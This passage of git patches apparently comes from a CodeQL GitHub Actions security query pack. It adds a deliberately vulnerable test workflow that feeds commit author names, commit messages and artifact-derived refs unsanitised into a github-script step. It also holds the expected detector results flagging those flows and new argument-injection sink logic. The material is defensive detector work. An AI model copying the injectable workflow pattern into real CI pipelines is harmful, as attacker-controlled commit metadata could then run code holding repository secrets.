pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: 📦 Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4c9ea8fe8ca..699d53da9cc 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -596,6 +619,10 @@ subpaths | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 262912c58a5..6d33d3cc569 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2e5379f289e88c64e6c151a7808ed898adea8dbf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 15:10:31 +0200 Subject: [PATCH 0586/1267] Update expected tests --- .../Security/CWE-074/OutputClobberingHigh.expected | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 715e2c4c90c..af792f1ab65 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -1,6 +1,6 @@ edges | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -24,7 +24,7 @@ nodes subpaths #select | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Tue, 15 Oct 2024 09:48:01 +0200 Subject: [PATCH 0587/1267] Move arg injection sinks to ShellScript class --- ql/lib/codeql/actions/Ast.qll | 8 ++ ql/lib/codeql/actions/Bash.qll | 52 ++++++++++-- ql/lib/codeql/actions/PowerShell.qll | 12 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 8 ++ .../security/ArgumentInjectionQuery.qll | 58 +++---------- ql/test/library-tests/commands.expected | 84 +++++++++---------- .../.github/workflows/arg_injection.yml | 12 +++ .../ArgumentInjectionCritical.expected | 1 - 8 files changed, 139 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 620f74e25bb..e41354ce31b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -354,6 +354,14 @@ class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) { + super.getAnEnvReachingArgumentInjectionSink(var, command, argument) + } + + predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) { + super.getACmdReachingArgumentInjectionSink(cmd, command, argument) + } + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 541ab437db2..12866a141a6 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -133,7 +133,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { @@ -155,7 +156,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } override string getAStmt() { result = this.getStmt(_) } @@ -186,7 +188,8 @@ class BashShellScript extends ShellScript { this.doCmdRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { @@ -208,13 +211,16 @@ class BashShellScript extends ShellScript { this.doCmdRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } string getACmd() { result = this.getCmd(_) } override string getCommand(int i) { - result = this.getCmd(i) and + // remove redirection + result = + this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords @@ -286,6 +292,18 @@ class BashShellScript extends ShellScript { Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, command, argument) + } + override predicate fileToGitHubEnv(string path) { Bash::fileToFileWrite(this, "GITHUB_ENV", path) } @@ -633,6 +651,30 @@ module Bash { ) } + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + cmdReachingRunExpr(script, source, argument) + ) + } + /** * Holds if a command output is used, directly or indirectly, in a Run's step expression. * Where the expression is a string captured from the Run's script. diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll index 1727930c2a3..3ae706970fa 100644 --- a/ql/lib/codeql/actions/PowerShell.qll +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -42,6 +42,18 @@ class PowerShellScript extends ShellScript { override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + none() + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + none() + } + override predicate fileToGitHubEnv(string path) { none() } override predicate fileToGitHubOutput(string path) { none() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 43772a978c5..7c433a39e62 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -227,6 +227,14 @@ class ShellScriptImpl extends ScalarValueImpl { abstract predicate getACmdReachingGitHubPathWrite(string cmd); + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + abstract predicate fileToGitHubEnv(string path); abstract predicate fileToGitHubOutput(string path); diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index a0309437292..f7e4a983445 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,23 